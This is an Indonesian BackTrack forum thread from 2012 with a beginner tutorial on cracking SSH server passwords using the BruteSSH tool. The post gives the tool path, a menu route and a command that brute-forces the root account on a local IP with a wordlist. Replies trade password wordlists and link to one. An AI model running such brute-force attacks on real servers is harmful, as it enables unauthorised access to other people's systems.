Hack password SSH Server menggunakan SSH Bruteforcer Ver. 0.2
#1
Salam Backtracker's , yg udah tau ga usah baca ya om.. soal.y tutornya ga mutu banget..

SSH Bruteforcer Ver. 0.2 hasil codingan Christian Martorella ini digunakan untuk meretas password SSH Server menggunakan teknik brute force. Oke, let's begin..

1. Buka SSH Bruteforcer Ver. 0.2 Anda yang terletak di /pentest/passwords/brutessh
Code:
[email protected]:~# cd /pentest/passwords/brutessh/

atau melalui GUI Backtrack Anda
Code:
All Applications >> Backtrack >> Privilege Escalation >> PasswordAttacks >> OnlineAttacks >> BruteSSH

2. Jalankan SSH BruteForcer nya degan perintah ./brutessh.py -h host_target -u username -d password_file
Code:
[email protected]:/pentest/passwords/brutessh# ./brutessh.py -h 192.168.88.254 -u root -d pass.txt

3. Hasil
Spoiler! :
[Image: snapshot1.jpg]

Semoga bermanfaat..

PHP Code:
_                       _             _     _ _             
| |                     | |           | |   (_|_)            
| |
__  _   _ _ __   __ _| | ___  _ __ | |__  _ _  __ _ _   _ 
'_ \| | | | '\ / _` | |/ _ \| '_ \| '_ \| | |/ _` | | | |
| |
_) | |_| | | | | (_| | | (_) | | | | | | | | | (_| | |_| |
|
_.__/ \__,_|_| |_|\__, |_|\___/|_| |_|_| |_|_| |\__,_|\__,_|
                    
__/ |                    _/ |            
                   |
___/                    |__

#2
Wah Big Grin threadnya menarik nih... di cobain dulu yah....

1 lagi nih, "Tidak ada tulisan yang tidak mutu sobat... semuanya itu bermutu tergantung bagaimana kita memandangnya"
Backtrack
Kisah tentang kita dan Linux

#3
sy praktek kan di jaringan lokal ini sja kawan.. blum diimplementasikan kluar, mka.y sy anggap ga bermutu.. hehehe

coba dulu, klo punya password list bagi bro ya..
PHP Code:
_                       _             _     _ _             
| |                     | |           | |   (_|_)            
| |
__  _   _ _ __   __ _| | ___  _ __ | |__  _ _  __ _ _   _ 
'_ \| | | | '\ / _` | |/ _ \| '_ \| '_ \| | |/ _` | | | |
| |
_) | |_| | | | | (_| | | (_) | | | | | | | | | (_| | |_| |
|
_.__/ \__,_|_| |_|\__, |_|\___/|_| |_|_| |_|_| |\__,_|\__,_|
                    
__/ |                    _/ |            
                   |
___/                    |__

#4
(07-16-2012, 11:40 PM)bunglonhijau Wrote: Salam Backtracker's , yg udah tau ga usah baca ya om.. soal.y tutornya ga mutu banget..

SSH Bruteforcer Ver. 0.2 hasil codingan Christian Martorella ini digunakan untuk meretas password SSH Server menggunakan teknik brute force. Oke, let's begin..

1. Buka SSH Bruteforcer Ver. 0.2 Anda yang terletak di /pentest/passwords/brutessh
Code:
[email protected]:~# cd /pentest/passwords/brutessh/

atau melalui GUI Backtrack Anda
Code:
All Applications >> Backtrack >> Privilege Escalation >> PasswordAttacks >> OnlineAttacks >> BruteSSH

2. Jalankan SSH BruteForcer nya degan perintah ./brutessh.py -h host_target -u username -d password_file
Code:
[email protected]:/pentest/passwords/brutessh# ./brutessh.py -h 192.168.88.254 -u root -d pass.txt

3. Hasil
Spoiler! :
[Image: snapshot1.jpg]

Semoga bermanfaat..

nice one ^_^
+1 from me ^_^

#5
(07-17-2012, 01:16 AM)bunglonhijau Wrote: sy praktek kan di jaringan lokal ini sja kawan.. blum diimplementasikan kluar, mka.y sy anggap ga bermutu.. hehehe

coba dulu, klo punya password list bagi bro ya..

Dsini ada password list kok, di search aja... soalnya kalau punyaku sih masih dikit juga Big Grin
Backtrack
Kisah tentang kita dan Linux

#6
passwrodlist dihalaman depan ibt om,,ada tuh
http://www.indonesianbacktrack.or.id/?p=477

#7
(07-17-2012, 03:00 AM)Backtrack Dragon Wrote:
(07-17-2012, 01:16 AM)bunglonhijau Wrote: sy praktek kan di jaringan lokal ini sja kawan.. blum diimplementasikan kluar, mka.y sy anggap ga bermutu.. hehehe

coba dulu, klo punya password list bagi bro ya..

Dsini ada password list kok, di search aja... soalnya kalau punyaku sih masih dikit juga Big Grin

nnti aja ah.. di gathering brikutnya.. ambilnya di brother..

hehehehe

Smile Smile
PHP Code:
_                       _             _     _ _             
| |                     | |           | |   (_|_)            
| |
__  _   _ _ __   __ _| | ___  _ __ | |__  _ _  __ _ _   _ 
'_ \| | | | '\ / _` | |/ _ \| '_ \| '_ \| | |/ _` | | | |
| |
_) | |_| | | | | (_| | | (_) | | | | | | | | | (_| | |_| |
|
_.__/ \__,_|_| |_|\__, |_|\___/|_| |_|_| |_|_| |\__,_|\__,_|
                    
__/ |                    _/ |            
                   |
___/                    |__

#8
kalau murni bruteforce ga pake wordlist gmn ya?

#9
(07-17-2012, 03:47 AM)junior.riau18 Wrote: passwrodlist dihalaman depan ibt om,,ada tuh
http://www.indonesianbacktrack.or.id/?p=477

Lengkap banget om.. makasih yaa..
Smile Smile
(07-17-2012, 05:58 AM)alkaaf Wrote: kalau murni bruteforce ga pake wordlist gmn ya?

klo aplikasi ini sih mesti pake wordlist.. ga tau aplikasi lain, mngkin ada yg ga pke wordlist.. tapi ane ga tau juga om.. hehehe, mklum pengguna baru,
Smile Smile
PHP Code:
_                       _             _     _ _             
| |                     | |           | |   (_|_)            
| |
__  _   _ _ __   __ _| | ___  _ __ | |__  _ _  __ _ _   _ 
'_ \| | | | '\ / _` | |/ _ \| '_ \| '_ \| | |/ _` | | | |
| |
_) | |_| | | | | (_| | | (_) | | | | | | | | | (_| | |_| |
|
_.__/ \__,_|_| |_|\__, |_|\___/|_| |_|_| |_|_| |\__,_|\__,_|
                    
__/ |                    _/ |            
                   |
___/                    |__





Users browsing this thread: 1 Guest(s)